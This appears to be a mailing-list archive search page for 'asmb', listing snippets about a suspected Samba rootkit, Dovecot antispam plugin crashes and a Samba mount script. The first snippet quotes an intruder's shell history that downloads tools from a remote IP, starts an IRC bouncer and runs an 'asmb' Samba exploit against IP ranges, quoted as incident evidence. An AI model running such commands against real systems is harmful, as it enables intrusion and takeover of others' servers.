search for: asmb

Displaying 6 results from an estimated 6 matches for "asmb".

Did you mean: asm
2003 Dec 27
1
Faked samba packages / rootkit?
...wget http://62.211.66.12/vendett/psymag.tar.gz > 215 tar zxvf psymag.tar.gz > 216 rm psymag.tar.gz > 217 cd psybnc > 218 wget http://62.211.66.12/vendett/psybnc.conf > 219 ./psybnc > 220 cd .. > 221 rm -fr psybnc > 222 wget http://62.211.66.12/pippo46/asmb.tar > 223 tar zyvf asmb.tar > 224 tar zxvf asmb.tar > 225 rm asmb.tar > 226 cd w00t/ > 227 ./asmb 120 > 228 ./asmb 110 > 229 ./asmb 217 > 230 ./asmb 217.229 > 231 cat woot.log > 232 ./samba -b 0 -v 217.229.113.107 > 233 ./asmb 217.46...
2014 Aug 17
3
antispam plugin crash
Hi, the dovecot antispam plugin crahses here on a nullpointer dereference in antispam_copy() at mailbox.c The crash tracks back to a call of antispam_classify_copy(asms->box_class, asmb->box_class) At that point in time asmb is set to 0x0, causing the process to crash with SIGSEGV. Regards, Thomas GDB output: Program received signal SIGSEGV, Segmentation fault. antispam_copy (ctx=0x14ed9f0, mail=0x14c6cc0) at mailbox.c:107 107 enum mailbox_copy_type copy_type = (gdb...
2013 Aug 01
1
Antispam folder names
Is there anywhere a collection of folder names for the antispam_trash and antispam_spam configuration? Our problem is that in academia, you have a vast amount of different clients, and some, like Microsoft, use language-specific folder names *on the server*. So we're now collecting folder names to better handle the rare cases. Two more problems: 1. We needed to fix UTF-8 handling in the
2010 Oct 23
2
[stava@telcotec.se: [stava: antispam problem]]
Hi All, I've built the dovecot-antispam-plugin from hg.dovecot.org and installed it. I've turned on debugging with "mail_debug = yes" in dovecot.conf and restarted dovecot. However, the antispam plugin module gets loaded by dovecot, but then nothing, i.e. when moving mail from Inbox to Spam and vice versa, I see nothing. How do I get debug messages from the
2014 Aug 18
1
antispam plugin crash
...on a nullpointer dereference in > antispam_copy() at mailbox.c does it crashes all of the time or for specific messages, mailboxes, etc.pp? What version of Dovecot and which configuration do you use? > > The crash tracks back to a call of > antispam_classify_copy(asms->box_class, asmb->box_class) - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBU/Gk9Xz1H7kL/d9rAQKM1Af+P5ntcfLDv8ilTqJ0TijyYOM7McZP2oSS tlsE99LjR+Ln7ZjT+8NJU1zpUOZOF20C0G3bdSIrDlHNeErUIkbd4pv75Hm7bHLy VSDKNyJ3oyu7tezc5b0mdzLPRCcUjSGNf2S5F9omBuDjzHGMfesArK3EcRKrkR3S 3...
2004 Jan 27
0
runaway smbd hogging system & ethernet cable bandwidth
...th updates I get this: --- [root@gene root]# rpm -qa|grep samba samba-client-2.2.7-3.7.3 samba-2.2.7-3.7.3 samba-common-2.2.7-3.7.3 samba-swat-2.2.7-3.7.3 --- I have a script on each machine what is started at bootup from a link in the rc3.d dir that looks like this on the firewall: ---/etc/init.d/asmb--- #!/bin/sh # chkconfig: 345 35 65 # description: The local samba shares starter start() { echo Starting share coyote: mount -t smbfs -o username=root,password=xxxxxxxxx //coyote.coyote.den/public /mnt/coyote mount -t smbfs -o username=root,password=xxxxxxxxx //coyote.coyote.den/root /mnt/coy...